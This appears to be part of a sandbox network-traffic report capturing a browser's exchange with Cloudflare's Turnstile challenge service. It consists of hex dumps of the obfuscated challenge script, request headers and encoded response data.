                                                                                                                  2024-10-22 14:08:22 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 62 61 58 49 73 34 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32
                                                                                                                  Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.baXIs4={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.terms":"https%3A%2
                                                                                                                  2024-10-22 14:08:22 UTC1369INData Raw: 53 75 63 63 65 73 73 25 32 31 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 5f 61 6c 77 61 79 73 5f 70 61 73 73 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f 6e 6c 79 25 32 43 25 32 30 61 6c 77 61 79 73 25 32 30 70 61 73 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 65 6e 64 25 32 30 46 65 65 64 62 61 63 6b 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 69 66 72 61 6d 65 5f 61 6c 74 22 3a 22 57 69 64 67 65 74 25 32 30 63 6f 6e 74 61 69 6e 69 6e 67 25 32 30 61 25 32 30 43 6c 6f 75 64 66 6c 61 72 65 25 32 30 73 65 63 75 72 69 74 79 25 32 30 63 68 61 6c 6c 65 6e 67 65 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 6f 6f 74 65 72 5f 70 72 69 76 61 63 79 22 3a 22 50 72 69 76 61 63 79 22 2c 22 74 75 72 6e 73
                                                                                                                  Data Ascii: Success%21","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","turnstile_feedback_description":"Send%20Feedback","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","turnstile_footer_privacy":"Privacy","turns
                                                                                                                  2024-10-22 14:08:22 UTC1369INData Raw: 33 33 29 29 2f 36 2b 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 31 34 34 33 29 29 2f 37 2b 70 61 72 73 65 49 6e 74 28 67 4b 28 31 33 36 35 29 29 2f 38 2a 28 70 61 72 73 65 49 6e 74 28 67 4b 28 31 33 34 38 29 29 2f 39 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 35 38 30 29 29 2f 31 30 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 33 37 35 29 29 2f 31 31 29 2c 64 3d 3d 3d 66 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 34 31 30 32 37 31 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 4c 28 38 31 35 29 5d 2c 65 4d 5b 67 4c 28 31 34 36 32 29 5d 3d 21 5b 5d 2c 65 4d 5b 67 4c 28 31 35 37 29 5d 3d 66 75 6e 63
                                                                                                                  Data Ascii: 33))/6+-parseInt(gK(1443))/7+parseInt(gK(1365))/8*(parseInt(gK(1348))/9)+-parseInt(gK(580))/10*(-parseInt(gK(375))/11),d===f)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,410271),eM=this||self,eN=eM[gL(815)],eM[gL(1462)]=![],eM[gL(157)]=func
                                                                                                                  2024-10-22 14:08:22 UTC1369INData Raw: 27 7c 27 29 2c 49 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 48 5b 49 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 6f 5b 68 67 28 32 38 34 29 5d 28 78 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 72 65 74 75 72 6e 21 5b 5d 3b 63 61 73 65 27 32 27 3a 4b 3d 28 4a 3d 7b 7d 2c 4a 5b 68 67 28 31 33 32 30 29 5d 3d 68 67 28 34 32 33 29 2c 4a 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 45 5b 68 67 28 31 38 36 29 5d 5b 68 67 28 31 31 38 35 29 5d 28 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 42 5b 68 67 28 31 38 36 29 5d 5b 68 67 28 35 33 38 29 5d 28 43 28 6f 5b 68 67 28 31 31 36 38 29 5d 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 35 27 3a 4c 3d 46 5b 68 67 28 31 38 36 29 5d 5b 68 67 28 37 36 39 29 5d 28 29 3b 63 6f
                                                                                                                  Data Ascii: '|'),I=0;!![];){switch(H[I++]){case'0':o[hg(284)](x);continue;case'1':return![];case'2':K=(J={},J[hg(1320)]=hg(423),J);continue;case'3':E[hg(186)][hg(1185)]();continue;case'4':B[hg(186)][hg(538)](C(o[hg(1168)]));continue;case'5':L=F[hg(186)][hg(769)]();co
                                                                                                                  2024-10-22 14:08:22 UTC1369INData Raw: 29 5d 28 32 3c 3c 66 2c 33 32 29 2c 65 4d 5b 68 6d 28 31 34 35 30 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 6e 29 7b 69 66 28 68 6e 3d 68 6d 2c 65 5b 68 6e 28 38 38 32 29 5d 28 68 6e 28 31 34 33 31 29 2c 65 5b 68 6e 28 31 33 39 30 29 5d 29 29 65 4d 5b 65 5b 68 6e 28 32 30 35 29 5d 5d 26 26 28 65 4d 5b 68 6e 28 31 38 36 29 5d 5b 68 6e 28 31 30 36 33 29 5d 28 29 2c 65 4d 5b 68 6e 28 31 38 36 29 5d 5b 68 6e 28 39 34 31 29 5d 28 29 2c 65 4d 5b 68 6e 28 32 39 38 29 5d 3d 21 21 5b 5d 2c 65 4d 5b 68 6e 28 31 34 38 38 29 5d 5b 68 6e 28 34 37 38 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 68 6e 28 34 32 33 29 2c 27 77 69 64 67 65 74 49 64 27 3a 65 4d 5b 68 6e 28 35 35 30 29 5d 5b 68 6e 28 31 32 36 32 29 5d 2c 27 65 76 65 6e 74 27 3a 68 6e 28 31 31 36 35 29 2c 27 63 66 43
                                                                                                                  Data Ascii: )](2<<f,32),eM[hm(1450)](function(hn){if(hn=hm,e[hn(882)](hn(1431),e[hn(1390)]))eM[e[hn(205)]]&&(eM[hn(186)][hn(1063)](),eM[hn(186)][hn(941)](),eM[hn(298)]=!![],eM[hn(1488)][hn(478)]({'source':hn(423),'widgetId':eM[hn(550)][hn(1262)],'event':hn(1165),'cfC
                                                                                                                  2024-10-22 14:08:22 UTC1369INData Raw: 6f 28 33 34 35 29 5d 28 66 5b 68 6f 28 31 34 37 29 5d 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 39 27 3a 42 3d 69 5b 68 6f 28 31 33 32 33 29 5d 28 69 5b 68 6f 28 38 34 36 29 5d 28 69 5b 68 6f 28 34 39 31 29 5d 28 69 5b 68 6f 28 38 34 36 29 5d 28 69 5b 68 6f 28 31 34 30 38 29 5d 2b 46 2b 68 6f 28 33 34 30 29 2b 31 2c 68 6f 28 31 31 35 36 29 29 2b 65 4d 5b 68 6f 28 35 35 30 29 5d 5b 68 6f 28 31 39 38 29 5d 2c 27 2f 27 29 2b 65 4d 5b 68 6f 28 35 35 30 29 5d 2e 63 48 2c 27 2f 27 29 2c 65 4d 5b 68 6f 28 35 35 30 29 5d 5b 68 6f 28 38 34 38 29 5d 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 30 27 3a 43 3d 67 4a 5b 68 6f 28 39 37 30 29 5d 28 78 29 5b 68 6f 28 31 31 34 33 29 5d 28 27 2b 27 2c 68 6f 28 31 35 36 38 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63
                                                                                                                  Data Ascii: o(345)](f[ho(147)]);continue;case'9':B=i[ho(1323)](i[ho(846)](i[ho(491)](i[ho(846)](i[ho(1408)]+F+ho(340)+1,ho(1156))+eM[ho(550)][ho(198)],'/')+eM[ho(550)].cH,'/'),eM[ho(550)][ho(848)]);continue;case'10':C=gJ[ho(970)](x)[ho(1143)]('+',ho(1568));continue;c
                                                                                                                  2024-10-22 14:08:22 UTC1369INData Raw: 72 28 31 34 35 30 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 73 29 7b 68 73 3d 68 72 2c 65 4d 5b 68 73 28 31 34 35 32 29 5d 28 29 7d 2c 31 65 33 29 3a 28 6b 3d 7b 7d 2c 6b 5b 68 72 28 34 36 38 29 5d 3d 64 2c 6b 5b 68 72 28 34 31 30 29 5d 3d 65 2c 6b 5b 68 72 28 35 38 35 29 5d 3d 66 2c 6b 5b 68 72 28 33 37 31 29 5d 3d 67 2c 6b 5b 68 72 28 31 34 37 29 5d 3d 68 2c 6c 3d 6b 2c 65 4d 5b 68 72 28 31 34 35 30 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 74 29 7b 68 74 3d 68 72 2c 65 4d 5b 68 74 28 39 38 32 29 5d 28 6c 2c 75 6e 64 65 66 69 6e 65 64 2c 68 74 28 31 34 33 39 29 29 7d 2c 31 30 29 2c 65 4d 5b 68 72 28 31 34 35 30 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 75 29 7b 68 75 3d 68 72 2c 65 4d 5b 68 75 28 31 34 35 32 29 5d 28 29 7d 2c 31 65 33 29 2c 65 4d 5b 68 72 28 34
                                                                                                                  Data Ascii: r(1450)](function(hs){hs=hr,eM[hs(1452)]()},1e3):(k={},k[hr(468)]=d,k[hr(410)]=e,k[hr(585)]=f,k[hr(371)]=g,k[hr(147)]=h,l=k,eM[hr(1450)](function(ht){ht=hr,eM[ht(982)](l,undefined,ht(1439))},10),eM[hr(1450)](function(hu){hu=hr,eM[hu(1452)]()},1e3),eM[hr(4
                                                                                                                  2024-10-22 14:08:22 UTC1369INData Raw: 67 62 5b 67 4c 28 31 32 38 33 29 5d 3d 66 45 2c 67 62 5b 67 4c 28 33 39 35 29 5d 3d 66 4f 2c 67 62 5b 67 4c 28 39 30 32 29 5d 3d 66 4e 2c 67 62 5b 67 4c 28 37 31 34 29 5d 3d 66 4d 2c 67 62 5b 67 4c 28 31 31 38 35 29 5d 3d 66 4c 2c 67 62 5b 67 4c 28 34 32 36 29 5d 3d 66 77 2c 67 62 5b 67 4c 28 37 36 33 29 5d 3d 67 61 2c 67 62 5b 67 4c 28 31 35 30 36 29 5d 3d 66 78 2c 67 62 5b 67 4c 28 35 33 38 29 5d 3d 66 42 2c 67 62 5b 67 4c 28 31 30 36 33 29 5d 3d 66 79 2c 67 62 5b 67 4c 28 31 31 38 38 29 5d 3d 66 74 2c 67 62 5b 67 4c 28 31 32 38 34 29 5d 3d 66 73 2c 65 4d 5b 67 4c 28 31 38 36 29 5d 3d 67 62 2c 65 4d 5b 67 4c 28 33 30 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6a 39 2c 67 2c 68 29 7b 68 3d 28 6a 39 3d 67 4c 2c 67 3d 7b 7d 2c 67 5b 6a 39 28 35 39 39 29
                                                                                                                  Data Ascii: gb[gL(1283)]=fE,gb[gL(395)]=fO,gb[gL(902)]=fN,gb[gL(714)]=fM,gb[gL(1185)]=fL,gb[gL(426)]=fw,gb[gL(763)]=ga,gb[gL(1506)]=fx,gb[gL(538)]=fB,gb[gL(1063)]=fy,gb[gL(1188)]=ft,gb[gL(1284)]=fs,eM[gL(186)]=gb,eM[gL(300)]=function(e,j9,g,h){h=(j9=gL,g={},g[j9(599)
                                                                                                                  2024-10-22 14:08:22 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 59 6d 74 45 45 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 46 51 4b 4b 71 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 3d 69 7d 2c 27 4f 51 45 6e 56 27 3a 6a 4d 28 31 33 30 30 29 2c 27 55 52 53 53 61 27 3a 6a 4d 28 31 30 30 31 29 2c 27 71 65 6d 61 55 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 4c 47 71 44 62 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 43 66 76 53 66 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 76 4d 59 74 70 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69
                                                                                                                  Data Ascii: function(h,i){return h<<i},'YmtEE':function(h,i){return h-i},'FQKKq':function(h,i){return h!==i},'OQEnV':jM(1300),'URSSa':jM(1001),'qemaU':function(h,i){return h-i},'LGqDb':function(h,i){return h<<i},'CfvSf':function(h,i){return h<<i},'vMYtp':function(h,i
                                                                                                                  2024-10-22 14:08:22 UTC1369INData Raw: 6a 4f 28 39 39 32 29 5d 28 48 2c 31 29 7c 4f 2c 64 5b 6a 4f 28 31 33 37 38 29 5d 28 49 2c 6a 2d 31 29 3f 28 49 3d 30 2c 47 5b 6a 4f 28 36 39 32 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4f 3d 30 2c 73 2b 2b 29 3b 66 6f 72 28 4f 3d 43 5b 6a 4f 28 31 32 32 29 5d 28 30 29 2c 73 3d 30 3b 31 36 3e 73 3b 48 3d 64 5b 6a 4f 28 36 35 31 29 5d 28 64 5b 6a 4f 28 38 37 37 29 5d 28 48 2c 31 29 2c 4f 26 31 2e 35 29 2c 49 3d 3d 64 5b 6a 4f 28 31 31 38 29 5d 28 6a 2c 31 29 3f 28 49 3d 30 2c 47 5b 6a 4f 28 36 39 32 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4f 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 44 2d 2d 2c 64 5b 6a 4f 28 31 38 37 29 5d 28 30 2c 44 29 26 26 28 44 3d 4d 61 74 68 5b 6a 4f 28 31 30 31 39 29 5d 28 32 2c 46 29 2c 46 2b 2b 29 2c 64 65 6c 65
                                                                                                                  Data Ascii: jO(992)](H,1)|O,d[jO(1378)](I,j-1)?(I=0,G[jO(692)](o(H)),H=0):I++,O=0,s++);for(O=C[jO(122)](0),s=0;16>s;H=d[jO(651)](d[jO(877)](H,1),O&1.5),I==d[jO(118)](j,1)?(I=0,G[jO(692)](o(H)),H=0):I++,O>>=1,s++);}D--,d[jO(187)](0,D)&&(D=Math[jO(1019)](2,F),F++),dele


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  12192.168.2.1649730104.18.94.414432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:22 UTC1150OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1571854637:1729602840:zvAtmTzhVMvcARSqZmG29O5V7h_Ph-feXgeguOMcDwY/8d6a0f0a98ece91e/bPN.remb.Z21oUkjCBQn607MW.5p7.j.runcpLO0s2k-1729606099-1.1.1.1-FxUbwo9qxrp3t45.o_DKYNcB3r6oK8pT8DAgKZ3z4VycwCeNNToDarphnbHVhIU. HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  Content-Length: 3383
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  Content-type: application/x-www-form-urlencoded
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  CF-Challenge: bPN.remb.Z21oUkjCBQn607MW.5p7.j.runcpLO0s2k-1729606099-1.1.1.1-FxUbwo9qxrp3t45.o_DKYNcB3r6oK8pT8DAgKZ3z4VycwCeNNToDarphnbHVhIU.
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Origin: https://challenges.cloudflare.com
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/7007c/0x4AAAAAAAxiX9jZ_UpA8p2c/auto/fbE/normal/auto/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:22 UTC3383OUTData Raw: 76 5f 38 64 36 61 30 66 30 61 39 38 65 63 65 39 31 65 3d 41 70 48 24 31 24 64 24 6e 24 43 24 31 53 76 38 53 76 51 24 53 52 6e 6d 31 2d 53 55 75 53 50 50 76 36 66 76 6e 6f 24 76 69 76 37 24 41 6d 4d 50 76 33 24 6a 51 48 24 6e 7a 56 48 76 6d 24 48 70 53 66 34 4d 48 24 76 7a 4b 76 6a 48 4d 56 76 63 59 76 37 6e 66 61 48 75 76 4e 24 4d 67 30 76 4e 66 6f 4d 55 76 53 52 76 6c 46 7a 47 61 55 45 45 76 43 51 35 71 76 63 45 59 4d 34 76 61 73 71 76 39 31 30 4c 67 75 7a 24 46 70 4d 43 6d 4e 62 48 76 6c 4f 24 76 55 4a 4d 53 48 63 39 30 4b 24 4d 54 52 39 63 25 32 62 56 77 52 69 76 7a 48 76 73 4f 53 5a 2b 54 24 6d 6d 4a 52 76 35 24 63 4b 45 24 6e 69 76 53 43 24 47 53 77 47 52 33 76 69 52 24 37 4d 76 55 77 52 6a 6e 48 76 66 54 4a 50 6a 31 6e 5a 50 6a 59 52 50 7a 48 76 2b
                                                                                                                  Data Ascii: v_8d6a0f0a98ece91e=ApH$1$d$n$C$1Sv8SvQ$SRnm1-SUuSPPv6fvno$viv7$AmMPv3$jQH$nzVHvm$HpSf4MH$vzKvjHMVvcYv7nfaHuvN$Mg0vNfoMUvSRvlFzGaUEEvCQ5qvcEYM4vasqv910Lguz$FpMCmNbHvlO$vUJMSHc90K$MTR9c%2bVwRivzHvsOSZ+T$mmJRv5$cKE$nivSC$GSwGR3viR$7MvUwRjnHvfTJPj1nZPjYRPzHv+
                                                                                                                  2024-10-22 14:08:22 UTC747INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:22 GMT
                                                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                                                  Content-Length: 149712
                                                                                                                  Connection: close
                                                                                                                  cf-chl-gen: QRMEg6gdJNr9r2Q1IHrDwgKITDCgCAdNXYCv0J8hufMC8cNHX6IPNA/5v3YK0wZtYVWgji1WpsZtzwACWQ63ZzDDvq423Vt5lWUQED3nQKM8RBgBW9klLodFvg0vbiAyjvaDDWpbOvXg0VoMWmU+Eln1vdJpuUuYPpiut/C5Aqos+ZZIQ8nqjDILW+AY7bCkikjqoeoEZPXAWcJqMH01LFqi0CPxPOI4eQAqIuieWCs96GrL51+LcguMXKjts6DS98jt4CNqgw29zRe1Gevp6q7C8Q4vbzOKLJJoqFiJorjYXJ7E3MjxFctUiAJ2lryFO3x+OBrg2gAsKDJfVRQha2nMr/693jygLOKB9d1SRGlHEXLPxfLN3989XAI/mhA6+cRl3pN2a0USJ2wn+1Rg/IxnXtuQuO24HcnQlWFqiE1uLgRkVaABAp9R8Qln5JjVFvJdJ2dd9Nm2E+9qpn/gSy2Zkx7BwX/MXF6QXtHXzJcXVak=$PS8DZBq3vtlmv3mg
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d6a0f1c6ff98787-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  2024-10-22 14:08:22 UTC622INData Raw: 6c 71 2b 51 74 4a 79 43 70 4b 4f 71 71 73 36 75 69 35 79 54 76 71 79 67 70 38 6d 73 74 4c 4f 62 73 74 36 32 74 74 66 50 35 4e 33 6d 6d 4c 72 56 74 4c 37 55 7a 63 43 6d 37 65 57 2b 38 39 33 73 77 38 32 79 73 73 72 6b 75 4f 6d 39 76 74 62 49 75 39 62 73 34 39 69 2b 76 74 76 66 2b 4d 62 48 7a 4f 6e 35 42 68 4d 4c 46 65 41 56 45 67 33 67 30 67 58 6d 37 78 33 79 31 65 37 5a 37 4f 50 37 38 76 41 57 49 76 62 30 47 68 7a 2b 43 41 67 6a 43 41 37 71 37 67 67 78 39 43 63 37 37 44 30 4a 2f 54 30 54 44 2f 67 4e 42 43 34 59 45 53 41 36 49 42 55 6b 51 43 46 47 4f 78 41 4f 4b 53 6f 32 56 78 59 56 4d 44 6b 57 4c 52 6c 54 56 78 31 69 4c 56 6c 66 59 6a 49 31 5a 31 78 4c 4f 56 64 6c 54 30 77 6f 59 46 4a 6f 59 79 39 76 61 6a 55 34 55 30 31 34 5a 6e 46 72 64 44 63 35 64 6a 39
                                                                                                                  Data Ascii: lq+QtJyCpKOqqs6ui5yTvqygp8mstLObst62ttfP5N3mmLrVtL7UzcCm7eW+893sw82yssrkuOm9vtbIu9bs49i+vtvf+MbHzOn5BhMLFeAVEg3g0gXm7x3y1e7Z7OP78vAWIvb0Ghz+CAgjCA7q7ggx9Cc77D0J/T0TD/gNBC4YESA6IBUkQCFGOxAOKSo2VxYVMDkWLRlTVx1iLVlfYjI1Z1xLOVdlT0woYFJoYy9vajU4U014ZnFrdDc5dj9
                                                                                                                  2024-10-22 14:08:22 UTC1369INData Raw: 4a 6e 61 6c 74 74 57 48 61 62 58 47 47 69 6e 6f 57 6a 67 33 4b 58 6d 58 32 64 6c 33 36 41 65 6d 69 75 66 61 56 73 63 49 79 44 73 36 75 79 6d 4b 69 4a 6d 4a 4e 33 77 59 4b 4d 6c 61 56 35 77 62 79 33 77 62 53 4d 77 4c 71 67 75 38 75 73 78 72 37 58 71 63 6e 43 30 36 50 61 31 37 4c 61 30 74 61 34 32 74 50 53 78 4a 33 55 75 4e 2f 62 77 62 7a 42 71 74 6e 65 76 37 48 76 72 61 2f 4d 74 38 66 31 75 4d 58 4c 74 2b 6e 67 2b 66 66 44 38 2f 54 47 35 67 6a 45 38 67 62 71 2b 51 72 6f 42 41 6e 7a 43 2b 7a 68 30 4f 73 54 31 67 6a 54 46 2b 67 41 31 75 44 5a 46 67 58 57 49 68 77 44 32 69 73 57 47 41 77 4c 43 2b 33 6d 4d 68 34 4b 41 42 55 54 49 76 49 36 4a 68 49 2b 48 52 73 72 49 45 49 75 47 43 41 6c 49 7a 4d 44 53 6a 59 66 54 69 30 72 50 44 42 53 50 69 6b 77 4e 54 4e 46 55
                                                                                                                  Data Ascii: JnalttWHabXGGinoWjg3KXmX2dl36AemiufaVscIyDs6uymKiJmJN3wYKMlaV5wby3wbSMwLqgu8usxr7XqcnC06Pa17La0ta42tPSxJ3UuN/bwbzBqtnev7Hvra/Mt8f1uMXLt+ng+ffD8/TG5gjE8gbq+QroBAnzC+zh0OsT1gjTF+gA1uDZFgXWIhwD2isWGAwLC+3mMh4KABUTIvI6JhI+HRsrIEIuGuserzMDSjYfTi0rPDBSPikwNTNFU
                                                                                                                  2024-10-22 14:08:22 UTC1369INData Raw: 65 6c 35 52 35 57 70 2b 55 6c 58 71 6e 68 6f 65 4c 71 71 4b 6a 61 59 6c 79 70 5a 57 54 6b 6f 79 35 75 61 57 4f 76 5a 79 61 71 35 2f 42 72 5a 69 66 70 4b 4b 30 77 70 4f 46 70 71 57 72 71 70 2b 6e 77 4d 65 6f 76 36 32 31 30 72 69 5a 30 61 33 57 6d 4e 62 4a 6e 73 7a 4e 71 39 61 69 34 61 61 6d 31 4d 6d 7a 33 71 72 6e 72 71 37 63 30 37 76 6d 73 75 57 32 74 75 54 56 77 2b 36 36 36 38 37 6f 31 74 6a 66 31 66 37 35 37 2f 50 36 76 4e 33 58 2f 51 38 51 38 51 6e 71 34 67 76 68 39 75 54 68 38 50 6e 54 31 66 63 55 36 42 76 59 49 41 50 73 49 42 44 2b 46 2b 41 6c 33 51 44 6c 4b 68 77 66 2f 42 77 56 41 7a 4c 30 36 53 55 33 4d 66 59 39 39 68 55 78 48 77 45 69 49 7a 67 78 46 50 30 31 42 42 63 36 47 54 63 63 49 77 6b 6d 44 53 64 47 55 45 6b 6f 49 78 55 6e 4c 56 77 64 57 7a
                                                                                                                  Data Ascii: el5R5Wp+UlXqnhoeLqqKjaYlypZWTkoy5uaWOvZyaq5/BrZifpKK0wpOFpqWrqp+nwMeov6210riZ0a3WmNbJnszNq9ai4aam1Mmz3qrnrq7c07vmsuW2tuTVw+66687o1tjf1f757/P6vN3X/Q8Q8Qnq4gvh9uTh8PnT1fcU6BvYIAPsIBD+F+Al3QDlKhwf/BwVAzL06SU3MfY99hUxHwEiIzgxFP01BBc6GTccIwkmDSdGUEkoIxUnLVwdWz
                                                                                                                  2024-10-22 14:08:22 UTC1369INData Raw: 65 71 6d 49 68 70 65 4c 72 5a 6d 45 69 35 43 4f 6f 4b 35 2f 63 5a 4b 52 6c 35 61 4c 6b 36 79 7a 6c 4b 75 5a 6f 62 2f 43 73 73 58 42 77 6f 54 43 74 59 71 34 75 5a 66 43 6a 73 32 53 6b 73 43 31 6e 38 71 57 30 37 79 53 79 4b 6e 4f 34 4d 71 31 73 71 4f 7a 70 73 66 48 33 37 54 44 75 61 53 6b 78 75 33 75 73 4c 7a 6f 79 66 58 4a 39 72 44 47 78 66 79 38 39 64 48 6f 30 73 48 59 2b 75 37 67 35 2b 62 58 78 77 6e 65 42 67 6a 62 33 39 33 39 43 74 45 4d 35 52 62 58 36 77 62 79 37 67 66 77 37 74 2f 76 34 67 55 61 48 50 45 41 39 52 6a 67 41 68 6f 72 37 66 67 6c 4a 44 4c 39 44 79 67 79 43 54 4d 75 4b 79 6b 48 37 77 7a 32 4e 51 38 79 45 79 30 63 50 7a 7a 36 4a 54 38 69 41 30 4e 49 43 77 4e 4f 48 30 56 4c 45 45 38 6b 4f 6c 68 59 4d 54 51 57 4e 6a 30 36 50 42 39 68 4e 68 30
                                                                                                                  Data Ascii: eqmIhpeLrZmEi5COoK5/cZKRl5aLk6yzlKuZob/CssXBwoTCtYq4uZfCjs2SksC1n8qW07ySyKnO4Mq1sqOzpsfH37TDuaSkxu3usLzoyfXJ9rDGxfy89dHo0sHY+u7g5+bXxwneBgjb3939CtEM5RbX6wby7gfw7t/v4gUaHPEA9RjgAhor7fglJDL9DygyCTMuKykH7wz2NQ8yEy0cPzz6JT8iA0NICwNOH0VLEE8kOlhYMTQWNj06PB9hNh0
                                                                                                                  2024-10-22 14:08:22 UTC1369INData Raw: 71 47 4c 67 49 4e 36 72 32 36 31 68 48 53 68 68 36 61 75 73 36 6d 70 72 34 69 78 66 62 69 76 66 4b 2b 65 6e 4c 47 35 7a 4c 65 36 6e 6f 32 6b 6a 36 76 54 71 61 53 6d 31 5a 66 61 75 5a 72 48 31 72 75 71 30 65 48 44 6e 4e 4f 6b 31 64 79 78 6f 75 72 6d 31 38 61 72 33 4d 47 6f 38 4d 6a 66 7a 72 58 6b 79 62 44 37 36 2b 6e 76 30 74 7a 50 75 39 50 50 33 66 7a 53 42 65 66 61 79 4c 30 4c 37 67 62 6a 36 63 7a 77 34 42 54 4d 35 67 6a 71 35 77 62 56 44 42 6a 63 48 78 6e 77 39 39 76 6a 46 79 45 70 4a 50 6a 36 34 68 63 66 2b 54 45 47 48 7a 4c 73 4d 42 49 4b 43 52 6f 7a 49 77 73 39 44 54 59 35 2f 68 67 37 50 78 51 68 42 79 51 38 4a 69 64 49 52 6b 34 36 4a 42 77 78 4c 30 45 6b 56 6b 49 73 46 45 38 58 4a 79 6f 33 48 32 41 36 4c 6b 73 39 4f 42 35 6e 4e 55 6b 6c 57 55 4d 39
                                                                                                                  Data Ascii: qGLgIN6r261hHShh6aus6mpr4ixfbivfK+enLG5zLe6no2kj6vTqaSm1ZfauZrH1ruq0eHDnNOk1dyxourm18ar3MGo8MjfzrXkybD76+nv0tzPu9PP3fzSBefayL0L7gbj6czw4BTM5gjq5wbVDBjcHxnw99vjFyEpJPj64hcf+TEGHzLsMBIKCRozIws9DTY5/hg7PxQhByQ8JidIRk46JBwxL0EkVkIsFE8XJyo3H2A6Lks9OB5nNUklWUM9
